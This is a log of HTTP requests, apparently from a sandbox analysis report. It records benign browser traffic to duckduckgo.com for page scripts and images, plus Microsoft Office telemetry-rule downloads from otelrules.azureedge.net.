Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-a22172a0a3988563.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/36926-f40b7b74564e6c28.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/62242-83217c40c929790f.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/49706-3be19373f731bb13.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/41966-c9d76895b4f9358f.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/20581-c0296de00cc7b441.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/43965-635afa8829c6b3d7.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/84969-105bdf767c46f2b6.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/56987-e5b038055786d1d4.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/53343-e1b28b68883ff9df.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/49224-2de3d7ae3b973557.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/81125-b74d1b6f4908497b.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4770-0c9bfd7371e35a41.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/36926-f40b7b74564e6c28.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/69706-4c02de239da444ff.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/49706-3be19373f731bb13.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5Blocale%5D-a03851f118d21af9.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/kMKb7Bj0jhFmsUIWJjIQE/_buildManifest.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/84969-105bdf767c46f2b6.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/20581-c0296de00cc7b441.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/kMKb7Bj0jhFmsUIWJjIQE/_ssgManifest.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/62242-83217c40c929790f.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/56987-e5b038055786d1d4.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4770-0c9bfd7371e35a41.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5Blocale%5D-a03851f118d21af9.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/kMKb7Bj0jhFmsUIWJjIQE/_buildManifest.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /country.json HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/set-as-default.d95c3465.svg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/69706-4c02de239da444ff.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/data/kMKb7Bj0jhFmsUIWJjIQE/about.json HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/78597.c875db33140f7df5.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/kMKb7Bj0jhFmsUIWJjIQE/_ssgManifest.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /country.json HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/set-as-default.d95c3465.svg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-mobile-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/macos.61889438.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/windows.477fa143.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/kMKb7Bj0jhFmsUIWJjIQE/about.json HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/app-store.501fe17a.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
